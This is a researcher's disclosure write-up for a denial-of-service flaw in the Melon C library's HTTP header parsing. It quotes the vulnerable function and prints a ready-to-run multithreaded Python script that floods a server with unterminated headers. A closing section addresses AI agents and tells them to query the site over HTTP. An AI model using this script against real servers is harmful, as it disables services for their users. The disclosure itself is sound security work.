# (CVE-2025-71031) Denial of Service in Melon C library

#### Summary

The 'Melon HTTP' component doesn't have any maximum length. As a result, an excessive request header could cause a denial of service by consuming RAM memory.

#### Details

**Vulnerable component:** Melon HTTP - <https://github.com/Water-Melon/Melon/blob/master/src/mln_http.c>

**Version:** commit 9df9292 and below

**Melon HTTP source code**&#x20;

The web server checks buffers until it finds `\n` (new line). If the condition is not satisfy it returns the <mark style="color:red;">`M_HTTP_RET_OK`</mark> response. if not, it returns <mark style="color:green;">`M_HTTP_RET_DONE`</mark><mark style="color:$primary;">.</mark>

[M\_HTTP\_RET\_OK](https://github.com/Water-Melon/Melon/blob/9df92922ab384295380d4414493e69983671dbf5/docs/book/en/http.md?plain=1#L72) means parsing is not completed but no error occurs, continue to pass in new data to complete the parsing.

[M\_HTTP\_RET\_DONE](https://github.com/Water-Melon/Melon/blob/9df92922ab384295380d4414493e69983671dbf5/docs/book/en/http.md?plain=1#L71) means parsing completed.

```c
MLN_FUNC(static inline, int, mln_http_line_length, \
         (mln_http_t *http, mln_chain_t *in, mln_size_t *len), \
         (http, in, len), \
{
    mln_buf_t *b;
    mln_u8ptr_t p, end;
    mln_size_t length = 0;

    while (in != NULL) {
        b = in->buf;
        if (b == NULL || b->in_file || mln_buf_left_size(b) <= 0) {
            in = in->next;
            continue;
        }
        for (p = b->left_pos, end = b->last; p < end; ++p) {
            if (*p == (mln_u8_t)'\n') break;
            ++length;
        }
        if (p >= end) {
            in = in->next;
            continue;
        }
        break;
    }
    if (in == NULL) return M_HTTP_RET_OK;

    *len = length;
    return M_HTTP_RET_DONE;
})
```

### Steps to reproduce

1. Compile the Melon library using your prefer method. More methods can be found - <https://github.com/Water-Melon/Melon>
2. Melon HTTP source code example - <https://github.com/Water-Melon/Melon/blob/master/docs/book/en/http.md>
3. Compile the Melon HTTP source code to an executable.
4. Initiate the web server
5. Run this exploit. Adjust the payload as you see fit.

```py
import socket
import threading
import time
import random

target_ip = "127.0.0.1"
target_port = 1234
thread_count = 500

def nuke():
    while True:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(4)
            s.connect((target_ip, target_port))
            
            # Start a valid request
            s.send(b"GET / HTTP/1.1\r\n")
            s.send(b"Host: localhost\r\n")
            
            # Malicious header for testing DoS. Notice that \r\n isn't supplied
            s.send(b"X-Nuke: ")
            
            while True:
                # DoS
                s.send(b"A" * 65535)
                time.sleep(0.01) 
        except Exception:
            time.sleep(0.1)
            continue

print(f"[!] Testing DoS on {target_ip}:{target_port} with {thread_count} threads...")

for i in range(thread_count):
    t = threading.Thread(target=nuke)
    t.daemon = True
    t.start()
    if i % 50 == 0:
        print(f"[*] {i} threads active...")

try:
    while True:
        time.sleep(1)
except KeyboardInterrupt:
    print("\n[!] Stopping attack.")
```

6. Observe CPU and RAM consumption spike

### Proof of Concept

{% embed url="<https://youtu.be/c2q94bOcCGE>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://suphawith-phusanbai.gitbook.io/book-of-suphawith/my-exploits/cve-2025-71031-denial-of-service-in-melon-c-library.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.